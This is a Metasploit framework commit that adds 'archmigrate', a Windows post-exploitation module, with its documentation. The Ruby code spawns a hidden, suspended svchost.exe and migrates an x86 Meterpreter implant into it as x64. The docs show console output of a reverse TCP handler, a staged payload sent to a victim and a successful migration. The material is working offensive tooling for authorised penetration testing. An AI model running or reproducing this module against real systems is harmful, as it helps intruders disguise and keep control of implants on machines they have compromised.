Land rapid7#8008, Added archmigrate module for windows sessions

bwatters-r7 · bwatters-r7 · commit dd5a91f153b0 · 2017-04-05T08:55:27.000-05:00
diff --git a/modules/post/windows/manage/archmigrate.md b/modules/post/windows/manage/archmigrate.md
@@ -0,0 +1,73 @@
+## Creating A Testing Environment
+  To use this module you need an x86 executable type meterpreter on a x64 windows machine.
+
+This module has been tested against:
+
+  1. Windows 10.
+  2. Windows 7.
+  3. Windows Server 2008R2
+
+This module was not tested against, but may work against:
+
+  1. Other versions of Windows that are x64.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Obatin a meterpreter session with an executable meterpreter via whatever method
+  3. Do: 'use post/windows/manage/archmigrate'
+  4. Do: 'set session #'
+  5. Do: 'run'
+
+## Scenarios
+
+### Windows 10 x64
+
+    msf exploit(handler) > run
+
+    [*] Started reverse TCP handler on <MSF_IP>:4567 
+    [*] Starting the payload handler...
+    [*] Sending stage (957487 bytes) to <Win10x64_IP>
+    [*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:50917) at 2017-03-22 11:43:42 -0500
+
+    meterpreter > sysinfo
+    Computer        : DESKTOP-SO4MCA3
+    OS              : Windows 10 (Build 14393).
+    Architecture    : x64
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/windows
+    meterpreter > background
+    [*] Backgrounding session 1...                
+    msf exploit(handler) > use post/windows/manage/archmigrate 
+    msf post(archmigrate) > set session 1
+    session => 1
+    msf post(archmigrate) > run
+
+    [*] The meterpreter is not the same architecture as the OS! Upgrading!
+    [*] Starting new x64 process C:\windows\sysnative\svchost.exe
+    [+] Got pid 1772
+    [*] Migrating..
+    [+] Success!
+    [*] Post module execution completed
+    msf post(archmigrate) > sessions -l
+
+    Active sessions
+    ===============
+
+      Id  Type                     Information                               Connection
+      --  ----                     -----------                               ----------
+      1   meterpreter x64/windows  DESKTOP-SO4MCA3\tmoose @ DESKTOP-SO4MCA3  <MSF_IP>:4567 -> <Win10x64_IP>:50917 (<Win10x64_IP>)
+
+    msf post(archmigrate) > sessions -i 1
+    [*] Starting interaction with 1...
+
+    meterpreter > sysinfo
+    Computer        : DESKTOP-SO4MCA3
+    OS              : Windows 10 (Build 14393).
+    Architecture    : x64
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x64/windows
diff --git a/modules/post/windows/manage/archmigrate.rb b/modules/post/windows/manage/archmigrate.rb
@@ -0,0 +1,91 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Post::File
+  include Msf::Post::Common
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name' => 'Architecture Migrate',
+      'Description' => %q(This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a
+                          new process with the correct architecture and migrates into that process.),
+      'License' => MSF_LICENSE,
+      'Author' => ['Koen Riepe (koen.riepe@fox-it.com)'],
+      'References' => [''],
+      'Platform' => [ 'win' ],
+      'Arch' => [ 'x86', 'x64' ],
+      'SessionTypes' => [ 'meterpreter' ]
+    )
+    )
+
+    register_options(
+      [
+        OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),
+        OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ])
+      ],
+      self.class
+    )
+  end
+
+  def check_32_on_64
+    begin
+      apicall = session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"]
+      # railgun returns '\x00\x00\x00\x00' if the meterpreter process is 64bits.
+      if apicall == "\x00\x00\x00\x00"
+        migrate = false
+      else
+        migrate = true
+      end
+      return migrate
+    rescue
+      print_error('Railgun not available, this module only works for binary meterpreters.')
+    end
+  end
+
+  def get_windows_loc
+    apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir", 255, 255)["lpBuffer"]
+    windir = apicall.split(":")[0]
+    return windir
+  end
+
+  def run
+    if check_32_on_64
+      print_status('The meterpreter is not the same architecture as the OS! Upgrading!')
+      newproc = datastore['EXE']
+      if exist?(newproc)
+        print_status("Starting new x64 process #{newproc}")
+        pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid
+        print_good("Got pid #{pid}")
+        print_status('Migrating..')
+        session.core.migrate(pid)
+        if pid == session.sys.process.getpid
+          print_good('Success!')
+        else
+          print_error('Migration failed!')
+        end
+      else
+        print_error('The selected executable to migrate into does not exist')
+        if datastore['FALLBACK']
+          windir = get_windows_loc
+          newproc = "#{windir}:\\windows\\sysnative\\svchost.exe"
+          if exist?(newproc)
+            print_status("Starting new x64 process #{newproc}")
+            pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid
+            print_good("Got pid #{pid}")
+            print_status('Migrating..')
+            session.core.migrate(pid)
+            if pid == session.sys.process.getpid
+              print_good('Success!')
+            else
+              print_error('Migration failed!')
+            end
+          end
+        end
+      end
+    else
+      print_good('The meterpreter is the same architecture as the OS!')
+    end
+  end
+end
